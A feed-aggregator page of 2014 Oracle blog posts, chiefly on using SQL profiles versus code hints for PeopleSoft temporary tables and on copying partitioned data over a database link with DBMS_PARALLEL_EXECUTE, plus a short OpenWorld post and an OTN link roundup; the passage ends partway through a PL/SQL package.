
Feed aggregator

To Hint or not to hint (Application Engine), that is the question

David Kurtz - Mon, 2014-08-25 12:36
Over the years, Oracle has provided a number of plan stability technologies to control how SQL statements are executed.  At the risk of over-simplification, Outlines (deprecated in 11g), Profiles, Baselines and Patches all work by injecting a set of hints into a SQL statement at parse time.  There is quite a lot of advice from Oracle to use these technologies to fix errant execution plans rather than hint the application.  I think that is generally good advice; however, there are times when this approach does not work well with PeopleSoft, and that is due to the behaviour and structure of PeopleSoft rather than the Oracle database.

It is possible to produce a SQL profile from a plan captured by AWR.  Part of the distribution for the SQLT Diagnostic Tool (Doc ID 215187.1) is a script called coe_xfr_sql_profile.sql, written by Carlos Sierra.
The only thing I would change in the delivered script (for use with PeopleSoft, and as suggested in a comment) is to create the profile with FORCE_MATCHING, so that similar statements with different literal values still match.
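For reference, the usual way to drive the script (a sketch from typical usage, not a quote from the delivered documentation) is to run it in SQL*Plus as a DBA, passing the SQL_ID and plan hash value of the plan you want to preserve; it then generates a second script that you review and run to create the profile:

REM Generate the profile script for a given SQL_ID and plan hash value,
REM then review and run the generated file to create the profile.
SQL> START coe_xfr_sql_profile.sql <sql_id> <plan_hash_value>
SQL> START coe_xfr_sql_profile_<sql_id>_<plan_hash_value>.sql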
The Slings and Arrows of outrageous execution plans

Let's take an example of a statement (from the vanilla Financials product that has not been customised) that performed poorly because it didn't generate a good execution plan (I have cut out most of the statement for readability).  Note that it references instance 5 of the PeopleTools temporary record CA_SUM_TAO.
INSERT INTO PS_CA_SUM_RC_TAO5 (…) SELECT

FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO5 B , PS_CA_SUM_IN_USE C WHERE

B.PROCESS_INSTANCE = 51381955 AND C.IN_USE_FLAG = 'Y'

Plan hash value: 2039212279
----------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------------------------------
| 0 | INSERT STATEMENT | | | | 14424 (100)| |
| 1 | LOAD TABLE CONVENTIONAL | | | | | |
| 2 | NESTED LOOPS | | | | | |
| 3 | NESTED LOOPS | | 1 | 430 | 14424 (1)| 00:02:54 |
| 4 | NESTED LOOPS | | 1 | 318 | 14421 (1)| 00:02:54 |
| 5 | TABLE ACCESS FULL | PS_CA_SUM_IN_USE | 1 | 85 | 14420 (1)| 00:02:54 |
| 6 | TABLE ACCESS BY INDEX ROWID| PS_CA_SUM_TAO5 | 1 | 233 | 1 (0)| 00:00:01 |
| 7 | INDEX UNIQUE SCAN | PS_CA_SUM_TAO5 | 1 | | 0 (0)| |
| 8 | INDEX RANGE SCAN | PSACA_PR_SUMM | 1 | | 2 (0)| 00:00:01 |
| 9 | TABLE ACCESS BY INDEX ROWID | PS_CA_PR_SUMM | 1 | 112 | 3 (0)| 00:00:01 |
----------------------------------------------------------------------------------------------------
However, below is the plan we get on instance 4.  We get this plan because a profile was applied in the past, but the process is now using a different non-shared instance of the temporary table, so the profile cannot match: the statement references different objects, and we get the same performance problem on the other non-shared instances of the temporary record.  Different literal values, such as those for Process Instance, can be handled by FORCE_MATCHING, but different tables cannot; as far as the database is concerned, this is a totally different SQL statement.
SQL_ID 5gtxdqbx0d0c3
--------------------
INSERT INTO PS_CA_SUM_RC_TAO4 (…) SELECT

FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO4 B , PS_CA_SUM_IN_USE C WHERE

B.PROCESS_INSTANCE = 51377796 AND C.IN_USE_FLAG = 'Y'

Plan hash value: 3552771247

---------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
---------------------------------------------------------------------------------------------------
| 0 | INSERT STATEMENT | | | | 36361 (100)| |
| 1 | LOAD TABLE CONVENTIONAL | | | | | |
| 2 | HASH JOIN | | 1 | 430 | 36361 (3)| 00:07:17 |
| 3 | TABLE ACCESS FULL | PS_CA_SUM_IN_USE | 1 | 85 | 14347 (1)| 00:02:53 |
| 4 | NESTED LOOPS | | | | | |
| 5 | NESTED LOOPS | | 1 | 345 | 22014 (3)| 00:04:25 |
| 6 | TABLE ACCESS FULL | PS_CA_PR_SUMM | 5268K| 562M| 21539 (1)| 00:04:19 |
| 7 | INDEX UNIQUE SCAN | PS_CA_SUM_TAO4 | 1 | | 0 (0)| |
| 8 | TABLE ACCESS BY INDEX ROWID| PS_CA_SUM_TAO4 | 1 | 233 | 1 (0)| 00:00:01 |
---------------------------------------------------------------------------------------------------

Note
-----
- SQL profile "coe_gn3n77gs6xj2a_3552771247" used for this statement
Of course, the statement on instance 4 had a profile because it was added as a short-term fix and then left in situ long term.  It worked fine until a process errored and left the non-shared instance of the temporary record allocated to that process instance, so PeopleSoft allocated instance 5 on the next execution.
So we could just create another profile using the coe_xfr_sql_profile.sql script:
SPO coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.log;
SET ECHO ON TERM ON LIN 2000 TRIMS ON NUMF 99999999999999999999;
REM
REM $Header: 215187.1 coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.sql 11.4.1.4 2014/08/13 csierra $
REM
REM Copyright (c) 2000-2010, Oracle Corporation. All rights reserved.
REM
REM AUTHOR
REM carlos.sierra@oracle.com
REM
REM SCRIPT
REM coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.sql
REM
REM DESCRIPTION
REM This script is generated by coe_xfr_sql_profile.sql
REM It contains the SQL*Plus commands to create a custom
REM SQL Profile for SQL_ID 5gtxdqbx0d0c3 based on plan hash
REM value 3552771247.
REM The custom SQL Profile to be created by this script
REM will affect plans for SQL commands with signature
REM matching the one for SQL Text below.
REM Review SQL Text and adjust accordingly.
REM
REM PARAMETERS
REM None.
REM
REM EXAMPLE
REM SQL> START coe_xfr_sql_profile_5gtxdqbx0d0c3_3552771247.sql;
REM
REM NOTES
REM 1. Should be run as SYSTEM or SYSDBA.
REM 2. User must have CREATE ANY SQL PROFILE privilege.
REM 3. SOURCE and TARGET systems can be the same or similar.
REM 4. To drop this custom SQL Profile after it has been created:
REM EXEC DBMS_SQLTUNE.DROP_SQL_PROFILE('coe_5gtxdqbx0d0c3_3552771247');
REM 5. Be aware that using DBMS_SQLTUNE requires a license
REM for the Oracle Tuning Pack.
REM
WHENEVER SQLERROR EXIT SQL.SQLCODE;
REM
VAR signature NUMBER;
REM
DECLARE
sql_txt CLOB;
h SYS.SQLPROF_ATTR;
BEGIN
sql_txt := q'[
INSERT INTO PS_CA_SUM_RC_TAO4 (PROCESS_INSTANCE, BUSINESS_UNIT, PROJECT_ID, ACTIVITY_ID, ANALYSIS_TYPE, RESOURCE_TYPE, RESOURCE_CATEGORY, RESOURCE_SUB_CAT, BI_DISTRIB_STATUS, GL_DISTRIB_STATUS, FOREIGN_CURRENCY, CONTRACT_CURRENCY, CONTRACT_NUM, CONTRACT_LINE_NUM, CA_FEE_STATUS, RESOURCE_QUANTITY, FOREIGN_AMOUNT_BSE, FOREIGN_AMOUNT_INC, FOREIGN_AMOUNT, CONTRACT_AMT_BSE, CONTRACT_AMT_INC, CONTRACT_AMT, MIN_TRANS_DT, MAX_TRANS_DT, CAND_MIN_TRANS_DT, CAND_MAX_TRANS_DT) SELECT B.PROCESS_INSTANCE, A.BUSINESS_UNIT, A.PROJECT_ID, A.ACTIVITY_ID, A.ANALYSIS_TYPE, A.RESOURCE_TYPE, A.RESOURCE_CATEGORY, A.RESOURCE_SUB_CAT, A.BI_DISTRIB_STATUS, A.GL_DISTRIB_STATUS,
A.FOREIGN_CURRENCY, A.CONTRACT_CURRENCY, A.CONTRACT_NUM, A.CONTRACT_LINE_NUM, A.CA_FEE_STATUS, (A.RESOURCE_QUANTITY+B.RESOURCE_QUANTITY), A.FOREIGN_AMOUNT, B.FOREIGN_AMOUNT, (A.FOREIGN_AMOUNT+B.FOREIGN_AMOUNT), A.CONTRACT_AMT, B.CONTRACT_AMT, (A.CONTRACT_AMT+B.CONTRACT_AMT), A.MIN_TRANS_DT, A.MAX_TRANS_DT, B.CAND_MIN_TRANS_DT, B.CAND_MAX_TRANS_DT FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO4 B , PS_CA_SUM_IN_USE C WHERE B.BUSINESS_UNIT = C.BUSINESS_UNIT AND B.PROJECT_ID = C.PROJECT_ID AND B.ACTIVITY_ID = C.ACTIVITY_ID AND B.ANALYSIS_TYPE = C.ANALYSIS_TYPE AND B.RESOURCE_TYPE = C.RESOURCE_TYPE AND B.RESOURCE_CATEGORY = C.RESOURCE_CATEGORY AND B.RESOURCE_SUB_CAT =
C.RESOURCE_SUB_CAT AND B.BI_DISTRIB_STATUS = C.BI_DISTRIB_STATUS AND B.GL_DISTRIB_STATUS = C.GL_DISTRIB_STATUS AND B.FOREIGN_CURRENCY = C.FOREIGN_CURRENCY AND B.CONTRACT_CURRENCY = C.CONTRACT_CURRENCY AND B.CONTRACT_NUM = C.CONTRACT_NUM AND B.CONTRACT_LINE_NUM = C.CONTRACT_LINE_NUM AND B.CA_FEE_STATUS = C.CA_FEE_STATUS AND A.BUSINESS_UNIT = B.BUSINESS_UNIT AND A.PROJECT_ID = B.PROJECT_ID AND A.ACTIVITY_ID = B.ACTIVITY_ID AND A.ANALYSIS_TYPE = B.ANALYSIS_TYPE AND A.RESOURCE_TYPE = B.RESOURCE_TYPE AND A.RESOURCE_CATEGORY = B.RESOURCE_CATEGORY AND A.RESOURCE_SUB_CAT = B.RESOURCE_SUB_CAT AND A.BI_DISTRIB_STATUS = B.BI_DISTRIB_STATUS AND A.GL_DISTRIB_STATUS =
B.GL_DISTRIB_STATUS AND A.FOREIGN_CURRENCY = B.FOREIGN_CURRENCY AND A.CONTRACT_CURRENCY = B.CONTRACT_CURRENCY AND A.CONTRACT_NUM = B.CONTRACT_NUM AND A.CONTRACT_LINE_NUM = B.CONTRACT_LINE_NUM AND A.CA_FEE_STATUS = B.CA_FEE_STATUS AND B.PROCESS_INSTANCE = 51377796 AND C.IN_USE_FLAG = 'Y'
]';
h := SYS.SQLPROF_ATTR(
q'[BEGIN_OUTLINE_DATA]',
q'[IGNORE_OPTIM_EMBEDDED_HINTS]',
q'[OPTIMIZER_FEATURES_ENABLE('11.2.0.3')]',
q'[DB_VERSION('11.2.0.3')]',
q'[OPT_PARAM('_unnest_subquery' 'false')]',
q'[OPT_PARAM('optimizer_dynamic_sampling' 4)]',
q'[OPT_PARAM('_optimizer_cost_based_transformation' 'off')]',
q'[ALL_ROWS]',
q'[OUTLINE_LEAF(@"SEL$1")]',
q'[OUTLINE_LEAF(@"INS$1")]',
q'[FULL(@"INS$1" "PS_CA_SUM_RC_TAO4"@"INS$1")]',
q'[FULL(@"SEL$1" "A"@"SEL$1")]',
q'[INDEX(@"SEL$1" "B"@"SEL$1" ("PS_CA_SUM_TAO4"."PROCESS_INSTANCE" "PS_CA_SUM_TAO4"."BUSINESS_UNIT" "PS_CA_SUM_TAO4"."PROJECT_ID" "PS_CA_SUM_TAO4"."ACTIVITY_ID" "PS_CA_SUM_TAO4"."ANALYSIS_TYPE" "PS_CA_SUM_TAO4"."RESOURCE_TYPE" "PS_CA_SUM_TAO4"."RESOURCE_CATEGORY" "PS_CA_SUM_TAO4"."RESOURCE_SUB_CAT" "PS_CA_SUM_TAO4"."BI_DISTRIB_STATUS" "PS_CA_SUM_TAO4"."GL_DISTRIB_STATUS" "PS_CA_SUM_TAO4"."FOREIGN_CURRENCY" "PS_CA_SUM_TAO4"."CONTRACT_CURRENCY" "PS_CA_SUM_TAO4"."CONTRACT_NUM" ]',
q'[ "PS_CA_SUM_TAO4"."CONTRACT_LINE_NUM" "PS_CA_SUM_TAO4"."CA_FEE_STATUS"))]',
q'[FULL(@"SEL$1" "C"@"SEL$1")]',
q'[LEADING(@"SEL$1" "A"@"SEL$1" "B"@"SEL$1" "C"@"SEL$1")]',
q'[USE_NL(@"SEL$1" "B"@"SEL$1")]',
q'[NLJ_BATCHING(@"SEL$1" "B"@"SEL$1")]',
q'[USE_HASH(@"SEL$1" "C"@"SEL$1")]',
q'[SWAP_JOIN_INPUTS(@"SEL$1" "C"@"SEL$1")]',
q'[END_OUTLINE_DATA]');
:signature := DBMS_SQLTUNE.SQLTEXT_TO_SIGNATURE(sql_txt);
DBMS_SQLTUNE.IMPORT_SQL_PROFILE (
sql_text => sql_txt,
profile => h,
name => 'coe_5gtxdqbx0d0c3_3552771247',
description => 'coe 5gtxdqbx0d0c3 3552771247 '||:signature||'',
category => 'DEFAULT',
validate => TRUE,
replace => TRUE,
force_match => TRUE /* TRUE:FORCE (match even when different literals in SQL). FALSE:EXACT (similar to CURSOR_SHARING) */ );
END;
/
WHENEVER SQLERROR CONTINUE
SET ECHO OFF;
PRINT signature
PRO
PRO ... manual custom SQL Profile has been created
PRO
SET TERM ON ECHO OFF LIN 80 TRIMS OFF NUMF "";
SPO OFF;
PRO
PRO COE_XFR_SQL_PROFILE_5gtxdqbx0d0c3_3552771247 completed
But then we must manually change the table and index names from 4 to 5.
DECLARE
sql_txt CLOB;
h SYS.SQLPROF_ATTR;
BEGIN
sql_txt := q'[
INSERT INTO PS_CA_SUM_RC_TAO5 (PROCESS_INSTANCE, BUSINESS_UNIT, PROJECT_ID, ACTIVITY_ID, ANALYSIS_TYPE, RESOURCE_TYPE, RESOURCE_CATEGORY, RESOURCE_SUB_CAT, BI_DISTRIB_STATUS, GL_DISTRIB_STATUS, FOREIGN_CURRENCY, CONTRACT_CURRENCY, CONTRACT_NUM, CONTRACT_LINE_NUM, CA_FEE_STATUS, RESOURCE_QUANTITY, FOREIGN_AMOUNT_BSE, FOREIGN_AMOUNT_INC, FOREIGN_AMOUNT, CONTRACT_AMT_BSE, CONTRACT_AMT_INC, CONTRACT_AMT, MIN_TRANS_DT, MAX_TRANS_DT, CAND_MIN_TRANS_DT, CAND_MAX_TRANS_DT) SELECT B.PROCESS_INSTANCE, A.BUSINESS_UNIT, A.PROJECT_ID, A.ACTIVITY_ID, A.ANALYSIS_TYPE, A.RESOURCE_TYPE, A.RESOURCE_CATEGORY, A.RESOURCE_SUB_CAT, A.BI_DISTRIB_STATUS, A.GL_DISTRIB_STATUS,
A.FOREIGN_CURRENCY, A.CONTRACT_CURRENCY, A.CONTRACT_NUM, A.CONTRACT_LINE_NUM, A.CA_FEE_STATUS, (A.RESOURCE_QUANTITY+B.RESOURCE_QUANTITY), A.FOREIGN_AMOUNT, B.FOREIGN_AMOUNT, (A.FOREIGN_AMOUNT+B.FOREIGN_AMOUNT), A.CONTRACT_AMT, B.CONTRACT_AMT, (A.CONTRACT_AMT+B.CONTRACT_AMT), A.MIN_TRANS_DT, A.MAX_TRANS_DT, B.CAND_MIN_TRANS_DT, B.CAND_MAX_TRANS_DT FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO5 B , PS_CA_SUM_IN_USE C WHERE B.BUSINESS_UNIT = C.BUSINESS_UNIT AND B.PROJECT_ID = C.PROJECT_ID AND B.ACTIVITY_ID = C.ACTIVITY_ID AND B.ANALYSIS_TYPE = C.ANALYSIS_TYPE AND B.RESOURCE_TYPE = C.RESOURCE_TYPE AND B.RESOURCE_CATEGORY = C.RESOURCE_CATEGORY AND B.RESOURCE_SUB_CAT =
C.RESOURCE_SUB_CAT AND B.BI_DISTRIB_STATUS = C.BI_DISTRIB_STATUS AND B.GL_DISTRIB_STATUS = C.GL_DISTRIB_STATUS AND B.FOREIGN_CURRENCY = C.FOREIGN_CURRENCY AND B.CONTRACT_CURRENCY = C.CONTRACT_CURRENCY AND B.CONTRACT_NUM = C.CONTRACT_NUM AND B.CONTRACT_LINE_NUM = C.CONTRACT_LINE_NUM AND B.CA_FEE_STATUS = C.CA_FEE_STATUS AND A.BUSINESS_UNIT = B.BUSINESS_UNIT AND A.PROJECT_ID = B.PROJECT_ID AND A.ACTIVITY_ID = B.ACTIVITY_ID AND A.ANALYSIS_TYPE = B.ANALYSIS_TYPE AND A.RESOURCE_TYPE = B.RESOURCE_TYPE AND A.RESOURCE_CATEGORY = B.RESOURCE_CATEGORY AND A.RESOURCE_SUB_CAT = B.RESOURCE_SUB_CAT AND A.BI_DISTRIB_STATUS = B.BI_DISTRIB_STATUS AND A.GL_DISTRIB_STATUS =
B.GL_DISTRIB_STATUS AND A.FOREIGN_CURRENCY = B.FOREIGN_CURRENCY AND A.CONTRACT_CURRENCY = B.CONTRACT_CURRENCY AND A.CONTRACT_NUM = B.CONTRACT_NUM AND A.CONTRACT_LINE_NUM = B.CONTRACT_LINE_NUM AND A.CA_FEE_STATUS = B.CA_FEE_STATUS AND B.PROCESS_INSTANCE = 51377796 AND C.IN_USE_FLAG = 'Y'
]';
h := SYS.SQLPROF_ATTR(
q'[BEGIN_OUTLINE_DATA]',
q'[IGNORE_OPTIM_EMBEDDED_HINTS]',
q'[OPTIMIZER_FEATURES_ENABLE('11.2.0.3')]',
q'[DB_VERSION('11.2.0.3')]',
q'[OPT_PARAM('_unnest_subquery' 'false')]',
q'[OPT_PARAM('optimizer_dynamic_sampling' 4)]',
q'[OPT_PARAM('_optimizer_cost_based_transformation' 'off')]',
q'[ALL_ROWS]',
q'[OUTLINE_LEAF(@"SEL$1")]',
q'[OUTLINE_LEAF(@"INS$1")]',
q'[FULL(@"INS$1" "PS_CA_SUM_RC_TAO5"@"INS$1")]',
q'[FULL(@"SEL$1" "A"@"SEL$1")]',
q'[INDEX(@"SEL$1" "B"@"SEL$1" ("PS_CA_SUM_TAO5"."PROCESS_INSTANCE" "PS_CA_SUM_TAO5"."BUSINESS_UNIT" "PS_CA_SUM_TAO5"."PROJECT_ID" "PS_CA_SUM_TAO5"."ACTIVITY_ID" "PS_CA_SUM_TAO5"."ANALYSIS_TYPE" "PS_CA_SUM_TAO5"."RESOURCE_TYPE" "PS_CA_SUM_TAO5"."RESOURCE_CATEGORY" "PS_CA_SUM_TAO5"."RESOURCE_SUB_CAT" "PS_CA_SUM_TAO5"."BI_DISTRIB_STATUS" "PS_CA_SUM_TAO5"."GL_DISTRIB_STATUS" "PS_CA_SUM_TAO5"."FOREIGN_CURRENCY" "PS_CA_SUM_TAO5"."CONTRACT_CURRENCY" "PS_CA_SUM_TAO5"."CONTRACT_NUM" ]',
q'[ "PS_CA_SUM_TAO5"."CONTRACT_LINE_NUM" "PS_CA_SUM_TAO5"."CA_FEE_STATUS"))]',
q'[FULL(@"SEL$1" "C"@"SEL$1")]',
q'[LEADING(@"SEL$1" "A"@"SEL$1" "B"@"SEL$1" "C"@"SEL$1")]',
q'[USE_NL(@"SEL$1" "B"@"SEL$1")]',
q'[NLJ_BATCHING(@"SEL$1" "B"@"SEL$1")]',
q'[USE_HASH(@"SEL$1" "C"@"SEL$1")]',
q'[SWAP_JOIN_INPUTS(@"SEL$1" "C"@"SEL$1")]',
q'[END_OUTLINE_DATA]');
:signature := DBMS_SQLTUNE.SQLTEXT_TO_SIGNATURE(sql_txt);
DBMS_SQLTUNE.IMPORT_SQL_PROFILE (
sql_text => sql_txt,
profile => h,
name => 'coe_5gtxdqbx0d0c3_3552771247',
description => 'coe 5gtxdqbx0d0c3 3552771247 '||:signature||'',
category => 'DEFAULT',
validate => TRUE,
replace => TRUE,
force_match => TRUE /* TRUE:FORCE (match even when different literals in SQL). FALSE:EXACT (similar to CURSOR_SHARING) */ );
END;
/
Or to take Arms against a Sea of statements

The profile has the advantage that it can be applied quickly without a code change.  It is the perfect tool for the DBA faced with a production performance problem. However, there are some other considerations.
  • If the statement references a PeopleSoft temporary record, then we need to apply the profile to all instances of the record (both the non-shared instances and the shared instance), as sketched after this list.
  • We were lucky that we referenced instance 5 of two temporary records. However, you could get a situation where a statement references different instances of different temporary records.  So perhaps instance 5 of one table and instance 6 of another.  In which case, you might also get instance 6 of the first table and instance 5 of the other.  A SQL profile could be needed for each permutation.
  • Bear in mind also that some areas of PeopleSoft use dynamically generated SQL.  So you get similar SQL statements which are sufficiently different for the profile not to match.  
  • Any changes to the expansion of Application Engine and PeopleCode MetaSQL on upgrading PeopleTools, or potentially even patching, will also prevent matching.
  • There is also the challenge of dealing with code changes as the system is upgraded, patched and customised.  A small code change, perhaps just an extra field in the select clause, can result in a performance regression because the profile stops matching. Of course, this challenge is not limited to PeopleSoft systems! 
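One way to handle the first point without repeating the manual edit for every instance is to loop over the instances and substitute the instance number into both the SQL text and the outline hints before importing each profile. This is only a minimal sketch under assumptions: the statement text and hint list are abbreviated, the instance range 1..5 and the %INST% placeholder are illustrative, and in practice every hint that names the temporary table must be substituted in the same way.

DECLARE
  sql_txt CLOB;
  h       SYS.SQLPROF_ATTR;
BEGIN
  FOR i IN 1 .. 5 LOOP  -- hypothetical instance range for the temporary record
    -- Full statement text goes here, with %INST% standing in for the instance number
    sql_txt := REPLACE(q'[
INSERT INTO PS_CA_SUM_RC_TAO%INST% (/* ... column list ... */) SELECT /* ... */
FROM PS_CA_PR_SUMM A, PS_CA_SUM_TAO%INST% B , PS_CA_SUM_IN_USE C
WHERE /* ... join predicates ... */ B.PROCESS_INSTANCE = 51377796 AND C.IN_USE_FLAG = 'Y'
]', '%INST%', TO_CHAR(i));
    -- Every outline hint that names the temporary table needs the same substitution
    h := SYS.SQLPROF_ATTR(
      q'[BEGIN_OUTLINE_DATA]',
      q'[IGNORE_OPTIM_EMBEDDED_HINTS]',
      REPLACE(q'[FULL(@"INS$1" "PS_CA_SUM_RC_TAO%INST%"@"INS$1")]', '%INST%', TO_CHAR(i)),
      /* ... remaining hints from the generated script, substituted the same way ... */
      q'[END_OUTLINE_DATA]');
    DBMS_SQLTUNE.IMPORT_SQL_PROFILE (
      sql_text    => sql_txt,
      profile     => h,
      name        => 'coe_ca_sum_rc_tao'||i,        -- hypothetical naming convention
      description => 'CA_SUM_RC_TAO insert, instance '||i,
      category    => 'DEFAULT',
      validate    => TRUE,
      replace     => TRUE,
      force_match => TRUE);
  END LOOP;
END;
/

Which profiles already exist, and whether they were created with force matching, can be checked in DBA_SQL_PROFILES:

SELECT name, status, force_matching FROM dba_sql_profiles;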
Profiles are likely to be effective if there are no PeopleSoft temporary records present.  So you can generally use them in COBOL and SQR processes and in the on-line application (other than in on-line Application Engine processes).

Aye, there's the rub

I would use a profile (or a set of profiles) as a short-term temporary fix that is easier to introduce into production, and then add hints to the source code and so fix all instances of the code, not just the ones that have been profiled. Of course, that does entail a code change, and everything that goes with that.  One strong argument against making a code change is that you have to change the code again to remove or alter the hint if it becomes unnecessary at some point in the future after a significant change, such as an Oracle upgrade.  However, on balance, I think it is better than the scenario where the profile stops working one day without warning.

The rest is silence. Unless you add a comment.

©David Kurtz, Go-Faster Consultancy Ltd.

★ How BIG is Oracle OpenWorld?

Eddie Awad - Sat, 2014-08-23 15:19

Oracle OpenWorld

Here is how big it was in 2013. Compare it to its size in 2012. It is safe to assume that it will be bigger in 2014!

I will attend this year’s event by invitation from the Oracle ACE Program. Prior to the start of the conference, I will be attending a two day product briefing with product teams at Oracle HQ. It’s like a mini OpenWorld but only for Oracle ACE Directors.

During the briefing, Oracle product managers talk about the latest and greatest product news. They also share super secret information that is not yet made public. I will report this information to you here on awads.net and via Twitter, unless of course it is protected by a non-disclosure agreement.

See you there!


© Eddie Awad's Blog, 2014.

Best of OTN - Week of August 17th

OTN TechBlog - Fri, 2014-08-22 11:43
Architect CommunityThe Top 3 most popular OTN ArchBeat video interviews of all time:
  1. Oracle Coherence Community on Java.net | Brian Oliver and Randy Stafford [October 24, 2013]
    Brian Oliver (Senior Principal Solutions Architect, Oracle Coherence) and Randy Stafford (Architect At-Large, Oracle Coherence Product Development) discuss the evolution of the Oracle Coherence Community on Java.net and how developers can actively participate in product development through Coherence Community open projects. Visit the Coherence Community at: https://java.net/projects/coherence.

  2. The Raspberry Pi Java Carputer and Other Wonders | Simon Ritter [February 13, 2014]
    Oracle lead Java evangelist Simon Ritter talks about his Raspberry Pi-based Java Carputer IoT project and other topics he presented at QCon London 2014.

  3. Hot Features in Oracle APEX 5.0 | Joel Kallman [May 14, 2014]
    Joel Kallman (Director, Software Development, Oracle) shares key points from his Great Lakes Oracle Conference 2014 session on new features in Oracle APEX 5.0.

Friday Funny from OTN Architect Community Manager Bob Rhubart:
Comedy legend Steve Martin entertains dogs in this 1976 clip from the Carol Burnett Show.

Database Community

OTN Database Community Home Page - See all tech articles, downloads etc. related to Oracle Database for DBA's and Developers.

Java Community

JavaOne Blog - JRuby and JVM Languages at JavaOne!  In this video interview, Charles shared the JRuby features he presented at the JVM Language Summit. He'll be at JavaOne; read the blog to see all the sessions.

Java Source Blog - IoT: Wearables! Wearables are a subset of the Internet of Things that has gained a lot of attention. Learn More.

I love Java FaceBook - Java Advanced Management Console demo - Watch as Jim Weaver, Java Technology Ambassador at Oracle, walks through a demonstration of the new Java Advanced Management Console (AMC) tool.

Systems Community

OTN Garage Blog - Why Wouldn't Root Be Able to Change a Zone's IP Address in Oracle Solaris 11? - Read and learn the answer.

OTN Garage FaceBook - Securing Your Cloud-Based Data Center with Oracle Solaris 11 - Overview of the security precautions a sysadmin needs to take to secure data in a cloud infrastructure, and how to implement them with the security features in Oracle Solaris 11.


Remote DML with DBMS_PARALLEL_EXECUTE

Dominic Brooks - Fri, 2014-08-22 10:20

An example of sucking data into a table over a db link using DBMS_PARALLEL_EXECUTE.

This particular example is based on something I needed to do in the real world, copying data from one database into another over a db link. Datapump is not available to me. Tables in question happen to be partitioned by a date-like number (boo!) hence some of the specific actions in the detail.

I think it’s a good example of how to use dbms_parallel_execute, but it might also be interesting to see how we might combine that functionality with parallel sessions, each operating on a single numeric partition.

For setup, let’s create a suitable source table on a remote db.
In this example, I’m recreating the entries in dba_objects for every day for a couple of years.

CREATE TABLE remote_px_test
(dt,owner,object_name,subobject_name,object_id,data_object_id,object_type,created,last_ddl_time,timestamp,status,temporary,generated,secondary,namespace,edition_name)
PARTITION BY RANGE(dt) INTERVAL(1)
(PARTITION p_default VALUES LESS THAN (20120101))
AS
WITH days AS
(SELECT TO_NUMBER(TO_CHAR(TO_DATE(20120101,'YYYYMMDD') + ROWNUM - 1,'YYYYMMDD')) dt
 FROM   dual
 CONNECT BY ROWNUM <= (TRUNC(SYSDATE) - TO_DATE(20120101,'YYYYMMDD')))
SELECT d.dt, o.*
FROM   dba_objects o
CROSS JOIN days d;
SELECT /*+ parallel(16) */ COUNT(*) FROM remote_px_test;
209957272

SELECT round(sum(bytes)/power(1024,3)) FROM user_segments WHERE segment_name = 'REMOTE_PX_TEST';
31

First step is to see how long it takes to do a parallel INSERT SELECT over a db link.

The benefits of parallelisation in such an operation are severely limited because we have a single session over the db link.

Back to the target database.

First create an empty destination table, same as remote.

CREATE TABLE remote_px_test
(dt,owner,object_name,subobject_name,object_id,data_object_id,object_type,created,last_ddl_time,timestamp,status,temporary,generated,secondary,namespace,edition_name)
PARTITION BY RANGE(dt) INTERVAL(1)
(PARTITION p_default VALUES LESS THAN (20100101))
AS
WITH days AS
(SELECT TO_NUMBER(TO_CHAR(TO_DATE(20120101,'YYYYMMDD') + ROWNUM - 1,'YYYYMMDD')) dt
 FROM   dual
 WHERE 1=0)
SELECT d.dt, o.*
FROM   dba_objects o
CROSS JOIN days d;

Now, let’s see how long it takes to do an INSERT SELECT over a db link.
Time is often not a good measure but in this case I’m primarily interested in how long it takes to copy a whole bunch of tables from A to B over a db link.

insert /*+ append */ into remote_px_test l
select * 
from   remote_px_test@d1 r;

209,957,272 rows inserted.

commit;

This executed in 20 minutes.

As mentioned, you could parallelise bits of it on either side, but the benefit is limited; it might even make things worse thanks to the BUFFER SORT operation.
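For reference, the parallel variant would look something like the sketch below. This is an illustration of the general approach rather than the statement actually run here, and even with parallel DML enabled the pull across the single db link session remains the bottleneck:

ALTER SESSION ENABLE PARALLEL DML;

INSERT /*+ APPEND PARALLEL(l 8) */ INTO remote_px_test l
SELECT /*+ PARALLEL(r 8) */ *
FROM   remote_px_test@d1 r;

COMMIT;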

Next, let’s compare this to the method using DBMS_PARALLEL_EXECUTE.

We want some parallel threads to work on independent partitions, doing direct path inserts, concurrently.

First I’m just going to create a view on the SOURCE DB to make my chunking on the daily partition interval simpler.

I could create this on the TARGET DB with references to the dictionary tables over the db link, but it could be significantly slower depending on the number of partitioned tables and whether predicates are being pushed.

CREATE OR REPLACE VIEW vw_interval_partitions
AS
SELECT table_name, partition_name, partition_position, hi
FROM   (SELECT table_name, partition_name, partition_position
        ,      to_char(
                 extractvalue(
                   dbms_xmlgen.getxmltype
                  ('select high_value from user_tab_partitions x'
                 ||' where x.table_name   = '''||t.table_name||''''
                 ||' and   x.partition_name = '''|| t.partition_name|| ''''),'//text()')) hi
        FROM   user_tab_partitions t);

Secondly, I’m going to create a little helper package which will generate the dynamic SQL for our inserts into specific partitions (the PARTITION FOR clause is not able to use binds).

		
CREATE OR REPLACE PACKAGE sid_data_pkg
AS
  --
  PROCEDURE sid_ipt (
    i_table_name                 IN     VARCHAR2,
    i_table_owner                IN     VARCHAR2,
    i_column_name                IN     VARCHAR2,
    i_dblink                     IN     VARCHAR2,
    i_start_id                   IN     NUMBER,
    i_end_id                     IN     NUMBER
  );
  --
END sid_data_pkg;
/

CREATE OR REPLACE PACKAGE BODY sid_data_pkg
AS
  PROCEDURE sid_ipt (
    i_table_name                 IN     VARCHAR2,
    i_table_owner                IN     VARCHAR2,
    i_column_name                IN     VARCHAR2,
    i_dblink                     IN     VARCHAR2,
    i_start_id                   IN     NUMBER,
    i_end_id                     IN     NUMBER
  )
  AS
    --
    l_cmd CLOB;
    --
  BEGIN
     --
     l_cmd :=
     q'{INSERT /*+ APPEND */}'||chr(10)||
     q'{INTO   }'||i_table_name||chr(10)||
     q'{PARTITION FOR (}'||i_start_id||')'||chr(10)||
     q'{SELECT *}'||chr(10)||
     q'{FROM   }'||CASE WHEN i_table_owner IS NOT NULL THEN i_table_owner||'.' END
